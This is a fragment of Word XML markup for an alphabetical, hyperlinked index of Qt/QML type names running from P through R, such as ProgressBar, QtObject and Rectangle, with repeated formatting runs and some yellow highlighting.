                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PlaceSearchSuggestionModel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76" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PlaneGeometry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77" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PlaneMesh</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78" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Playlist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79" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PlaylistItem</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80" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PlayVariation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81" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Plugin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82" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PluginParameter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83" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>point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84" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PointDirection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85" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PointLight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86" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PointSize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87" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PolarChartView</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88" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PolygonOffset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89" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Popup</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90" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Position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91" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Positioner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92" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PositionSource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93" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PressureReading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94" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PressureSensor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95" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Product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196" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ProgressBar: QtQuickControls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197" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ProgressBar: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98" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ProgressBarStyle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199" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PropertyAction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00" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PropertyAnimation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01" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PropertyChanges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02" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ProximityReading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03" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ProximitySensor</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>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bookmarkStart w:id="1178" w:name="q"/>
            <w:bookmarkEnd w:id="1178"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Q</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04" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QAbstractState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05" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QAbstractTransition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06" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QSignalTransition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07" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Qt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08" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QtMultimedia</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09" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QtObject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10" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QtPositioning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11" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>quaternion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12" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QuaternionAnimation</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79" w:name="r"/>
            <w:bookmarkEnd w:id="1179"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>R</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213" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RadialBlur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14" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RadialGradient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15" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Radio</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216" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RadioButton: QtQuickControls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217" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RadioButton: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18" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RadioButtonStyle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19" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RadioData</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20" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RadioDelegate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21" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RangeSlider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22" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Ratings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223" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>real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224" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>rect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25" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Rectangle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26" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RectangleShape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27" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RectangularGlow</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228" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RecursiveBlur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29" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RegExpValidator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30" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RenderCapture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31" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RenderCaptureReply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32" w:history="1">
